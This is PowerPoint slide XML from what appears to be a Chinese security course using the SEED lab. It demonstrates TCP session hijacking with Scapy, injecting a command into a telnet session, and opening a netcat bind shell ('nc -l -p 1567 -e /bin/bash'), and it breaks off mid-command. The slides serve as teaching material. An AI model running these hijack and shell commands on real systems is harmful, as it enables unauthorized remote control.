              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>900641567</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>data = "\n touch /tmp/myfile.txt\n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>pkt = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>send(pkt, verbose=0)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C35CEF-BC71-4016-91DE-6183A3EE1EB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043607" y="5085184"/>
            <a:ext cx="6972531" cy="1584176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1851883897"/>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4F5907-35FA-4EFC-B133-6F4BF825CDE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自动进行会话劫持攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{625B6EAF-E09A-4B67-ACDA-AECD86B503E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="683569" y="1844824"/>
            <a:ext cx="7128792" cy="4320480"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FE4F7DC-0D3E-408B-90A0-D0800ED5CBEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076056" y="2708920"/>
            <a:ext cx="3312368" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：输入命令一次发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>个字符，服务器回显</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>客户端自己可能还在输入数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1620517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392D49-F9C1-405A-A7C9-170A2EE75EDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话劫持后</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E00B7FF-D396-48AE-AF0C-E167A41D11C9}"/>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DBA2248D-3C67-4A1C-ACF6-B0EC6642DB05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="569220" y="1772816"/>
            <a:ext cx="6948538" cy="3705252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EE28BD2-A533-4F59-AD1E-1739382228B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="4039184"/>
            <a:ext cx="6724699" cy="1709750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C9ADB17-B36D-4129-9F31-0D272DA04BB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3347864" y="5809183"/>
            <a:ext cx="4608512" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>会话劫持有没有更严重的后果？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2324176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7E3B4-FD14-42CC-91D0-9D8C519F5212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>正向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3863B227-E808-4959-A6AC-04539A574666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>服务器监听，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>建立连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="266700" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> -l -p 1567 -e /bin/bash </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="666750" lvl="1" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>listen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>模式，用于服务器端</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="666750" lvl="1" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>    -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 监听端口</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="666750" lvl="1" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>    -e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>连接建立后运行的程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="266700" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（客户端）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 172.17.0.2 1567</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Seed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>虚拟机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>不支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>参数，但是可以通过重定向实现）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>#rm –f /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0" err="1">
                <a:solidFill>
